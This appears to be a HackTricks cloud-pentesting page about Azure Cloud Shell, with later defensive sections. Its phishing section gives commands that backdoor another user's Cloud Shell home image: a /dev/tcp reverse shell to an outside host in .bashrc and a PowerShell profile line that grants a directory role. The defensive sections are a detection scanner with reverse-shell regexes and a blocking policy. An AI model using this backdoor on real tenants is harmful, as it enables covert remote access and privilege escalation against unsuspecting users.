Az - Cloud Shell


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Azure Cloud Shell

Azure Cloud Shell is an interactive, authenticated, browser-accessible terminal for managing Azure resources, offering the choice of working with Bash or PowerShell. It runs on a temporary, per-session host that times out after 20 minutes of inactivity, while persisting files in the $HOME location through a 5-GB file share. Cloud Shell can be accessed from several places, including the Azure portal, shell.azure.com, the Azure CLI and PowerShell documentation, the Azure mobile app, and the Azure Account extension in Visual Studio Code.

No permissions are granted to this service, so there are no privilege-escalation techniques for it. There is also no enumeration of any kind.

Key Features

  • Pre-installed tools: Cloud Shell ships with a full set of pre-installed tools such as the Azure CLI, Azure PowerShell, Terraform, the Docker CLI, Ansible, Git, and text editors such as vim, nano and emacs. These tools are ready to use. To list the installed packages and modules, you can use "Get-Module -ListAvailable", "tdnf list" and "pip3 list".
  • Azure drive (Azure:): PowerShell in Azure Cloud Shell includes the Azure drive (Azure:), which allows easy navigation of Azure resources such as Compute, Network and Storage with file-system-like commands. Switch to the Azure drive with cd Azure: and return to your home directory with cd ~. You can still use Azure PowerShell cmdlets to manage resources from any drive.
  • Custom tool installation: Users who start Cloud Shell with a storage account can install additional tools that do not require root permissions. This allows further tailoring of the Cloud Shell environment, letting users customise their setup to their specific needs.
  • Persistent $HOME: When you start Azure Cloud Shell for the first time, you can use it with or without an attached storage account.
  • Choosing not to attach storage creates an ephemeral session in which files are deleted when the session ends.
  • To persist files between sessions, you are given the option to attach a storage account, which is automatically mounted as $HOME\clouddrive, while your $HOME directory is saved as a .img file in the File Share.

Cloud Shell Phishing

If an attacker finds other users' images in a Storage Account to which he has read and write access, he will be able to download the image, add a bash and PS backdoor inside it, and upload it back to the Storage Account, so that when the user next opens the shell the commands are executed automatically.

  • Download, backdoor and upload the image:
```bash
# Download image
mkdir /tmp/phishing_img
az storage file download-batch -d /tmp/phishing_img --account-name <acc-name>

# Mount image
cd /tmp/phishing_img/.cloudconsole
mkdir /tmp/cloudpoison
sudo mount acc_username.img /tmp/cloudpoison
cd /tmp/cloudpoison
sudo mkdir .config
sudo mkdir .config/PowerShell
sudo touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
sudo chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1

# Bash backdoor
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc

# PS backdoor
echo "Connect-AzureAD; Add-AzureADDirectoryRoleMember -ObjectId 1246bcfd-42dc-4bb7-a86d-3637ca422b21 -RefObjectId 1D8B2447-8318-41E5-B365-CB7275862F8A" >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
cd /tmp

sudo umount /tmp/cloudpoison

# Upload image (absolute path: the original "./tmp/..." would resolve to /tmp/tmp/... after cd /tmp)
az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "/tmp/phishing_img/.cloudconsole/acc_username.img"
```
  • Then, lure the user into opening https://shell.azure.com/
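The defender-side counterpart of the procedure above is to audit the `.img` files in the Cloud Shell file share for exactly this kind of startup-file tampering. The following is an added example, not HackTricks' code; it assumes the image has already been mounted or extracted to a local directory, and the home directory it builds for the demo is constructed (a benign `.bashrc` next to a poisoned PowerShell profile). It flags startup files that are world-writable or that contain reverse-shell or directory-role-change commands.

```python
"""Audit an extracted Cloud Shell home image for injected startup hooks.

Added example (not HackTricks' own tooling). Assumes the user's .img from the
share is already mounted/extracted to a local directory; the demo home built
by build_sample_home() is constructed, not a real user's data.
"""
import re
import tempfile
from pathlib import Path

# Startup files that run automatically when a Cloud Shell session opens.
STARTUP_FILES = [
    ".bashrc",
    ".bash_profile",
    ".profile",
    ".config/PowerShell/Microsoft.PowerShell_profile.ps1",
]

# Indicators of a reverse shell or a silent directory-role change in a profile.
SUSPICIOUS = {
    "reverse_shell": re.compile(r"/dev/tcp/|\bnc\b.*-e|bash\s+-i"),
    "background_shell": re.compile(r"\bnohup\b.*\bbash\b"),
    "role_change": re.compile(
        r"Add-AzureADDirectoryRoleMember|New-AzRoleAssignment|Add-AzADGroupMember", re.I
    ),
}


def scan_home_dir(home: str) -> list:
    """Return one finding per (file, indicator) hit; a world-writable startup
    file is reported too, since the poisoning leaves the profile at mode 777."""
    findings = []
    for rel in STARTUP_FILES:
        p = Path(home) / rel
        if not p.is_file():
            continue
        if p.stat().st_mode & 0o002:
            findings.append({"file": rel, "indicator": "world_writable", "line": None})
        for lineno, line in enumerate(p.read_text(errors="replace").splitlines(), 1):
            for name, rx in SUSPICIOUS.items():
                if rx.search(line):
                    findings.append({"file": rel, "indicator": name, "line": lineno})
    return findings


def build_sample_home() -> str:
    """Construct a demo home directory: a clean .bashrc plus a poisoned
    PowerShell profile (placeholder ids, not real object ids). Returns the path."""
    home = Path(tempfile.mkdtemp(prefix="cloudshell_home_"))
    bashrc = home / ".bashrc"
    bashrc.write_text("alias ll='ls -la'\nexport EDITOR=vim\n")
    bashrc.chmod(0o644)  # fix the mode so the demo does not depend on umask
    ps_dir = home / ".config" / "PowerShell"
    ps_dir.mkdir(parents=True)
    profile = ps_dir / "Microsoft.PowerShell_profile.ps1"
    profile.write_text(
        "Set-PSReadLineOption -EditMode Emacs\n"
        "Add-AzureADDirectoryRoleMember -ObjectId <role-id> -RefObjectId <user-id>\n"
    )
    profile.chmod(0o777)  # the permissive mode the poisoning step leaves behind
    return str(home)


if __name__ == "__main__":
    for f in scan_home_dir(build_sample_home()):
        print(f"{f['indicator']:>16}  {f['file']}  line={f['line']}")
```

Run it against a mounted image by passing the mount point to `scan_home_dir`; anything it reports is worth comparing with the user's own last-known profile before the share is considered clean.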

Detect & Block Cloud Shell Storage Accounts

Storage accounts created by Cloud Shell are tagged with ms-resource-usage:azure-cloud-shell. It is possible to create an Azure resource policy that blocks the creation of resources carrying this tag.

Find all storage accounts created by Cloud Shell, by tag:

```bash
az storage account list --output json | jq '.[] | select(.tags["ms-resource-usage"]=="azure-cloud-shell")'
```

Policy that blocks the automatic creation of storage accounts for Cloud Shell storage, based on the tag:

```json
{
  "displayName": "Restrict cloud shell storage account creation",
  "description": "Storage accounts that you create in Cloud Shell are tagged with ms-resource-usage:azure-cloud-shell. If you want to disallow users from creating storage accounts in Cloud Shell, create an Azure resource policy for tags that is triggered by this specific tag. https://learn.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage#restrict-resource-creation-with-an-azure-resource-policy",
  "metadata": {
    "category": "Storage",
    "version": "1.0.0"
  },
  "mode": "All",
  "parameters": {
    "effect": {
      "type": "String",
      "metadata": {
        "displayName": "Effect",
        "description": "Deny, Audit or Disabled the execution of the Policy"
      },
      "allowedValues": [
        "Deny",
        "Audit",
        "Disabled"
      ],
      "defaultValue": "Audit"
    }
  },
  "policyRule": {
    "if": {
      "allOf": [
        {
          "field": "type",
          "equals": "Microsoft.Storage/storageAccounts"
        },
        {
          "field": "tags['ms-resource-usage']",
          "equals": "azure-cloud-shell"
        }
      ]
    },
    "then": {
      "effect": "[parameters('effect')]"
    }
  }
}
```
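Before assigning the policy it helps to dry-run its rule locally, and the same field logic doubles as the tag filter from the jq one-liner above. The block below is an added example, not the page's or Microsoft's tooling: it implements only the subset of Azure Policy semantics the rule uses (allOf/anyOf/not, `field`, `equals` with Azure's case-insensitive string match, and a parameterised effect validated against `allowedValues`). The resource records are constructed to resemble trimmed `az storage account list` output and are not real accounts.

```python
"""Dry-run the Cloud Shell storage-account tag policy against sample resources.

Added example (not the page's or Microsoft's code). Only the Azure Policy
features used by the rule are modelled; the sample resources are constructed.
"""
import re

# policyRule and the effect parameter, copied from the policy definition above.
POLICY = {
    "parameters": {
        "effect": {"allowedValues": ["Deny", "Audit", "Disabled"], "defaultValue": "Audit"}
    },
    "policyRule": {
        "if": {
            "allOf": [
                {"field": "type", "equals": "Microsoft.Storage/storageAccounts"},
                {"field": "tags['ms-resource-usage']", "equals": "azure-cloud-shell"},
            ]
        },
        "then": {"effect": "[parameters('effect')]"},
    },
}

_TAG_FIELD = re.compile(r"^tags\['([^']+)'\]$")
_PARAM_REF = re.compile(r"^\[parameters\('([^']+)'\)\]$")


def get_field(resource: dict, field: str):
    """Resolve a policy field alias: a top-level key or tags['name']."""
    m = _TAG_FIELD.match(field)
    if m:
        return (resource.get("tags") or {}).get(m.group(1))
    return resource.get(field)


def condition_matches(cond: dict, resource: dict) -> bool:
    """Evaluate the logical operators and the 'equals' condition used by the rule."""
    if "allOf" in cond:
        return all(condition_matches(c, resource) for c in cond["allOf"])
    if "anyOf" in cond:
        return any(condition_matches(c, resource) for c in cond["anyOf"])
    if "not" in cond:
        return not condition_matches(cond["not"], resource)
    value = get_field(resource, cond["field"])
    if "equals" in cond:
        # Azure Policy compares strings case-insensitively; a missing tag never matches.
        return value is not None and str(value).lower() == str(cond["equals"]).lower()
    raise ValueError(f"unsupported condition: {cond}")


def resolve_param(value: str, params: dict, policy: dict) -> str:
    """Expand [parameters('x')], enforcing allowedValues where declared."""
    m = _PARAM_REF.match(value)
    if not m:
        return value
    name = m.group(1)
    spec = policy["parameters"][name]
    chosen = params.get(name, spec["defaultValue"])
    if "allowedValues" in spec and chosen not in spec["allowedValues"]:
        raise ValueError(f"{chosen!r} is not an allowed value for parameter {name}")
    return chosen


def evaluate(policy: dict, resource: dict, params=None):
    """Return the effect the policy would apply to resource, or None if it does not match."""
    params = params or {}
    rule = policy["policyRule"]
    if not condition_matches(rule["if"], resource):
        return None
    return resolve_param(rule["then"]["effect"], params, policy)


# Constructed sample records in the shape of `az storage account list` output (trimmed).
SAMPLE_RESOURCES = [
    {"name": "cs1234abcd", "type": "Microsoft.Storage/storageAccounts",
     "tags": {"ms-resource-usage": "azure-cloud-shell"}},
    {"name": "prodlogs", "type": "Microsoft.Storage/storageAccounts",
     "tags": {"env": "prod"}},
    {"name": "vm01", "type": "Microsoft.Compute/virtualMachines",
     "tags": {"ms-resource-usage": "azure-cloud-shell"}},
    {"name": "untagged", "type": "Microsoft.Storage/storageAccounts", "tags": None},
]


def find_cloud_shell_accounts(resources: list) -> list:
    """Python equivalent of the jq filter: storage accounts carrying the Cloud Shell tag."""
    return [
        r["name"] for r in resources
        if r["type"] == "Microsoft.Storage/storageAccounts"
        and get_field(r, "tags['ms-resource-usage']") == "azure-cloud-shell"
    ]


if __name__ == "__main__":
    print("Cloud Shell accounts:", find_cloud_shell_accounts(SAMPLE_RESOURCES))
    for r in SAMPLE_RESOURCES:
        print(r["name"], "->", evaluate(POLICY, r, {"effect": "Deny"}))
```

Note that the rule only fires on storage accounts carrying the tag, so the tagged VM and the untagged storage account fall through; with the default parameter the policy only audits, and it has to be assigned with `effect = Deny` to actually block creation.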

Persistence

Az - Cloud Shell Persistence
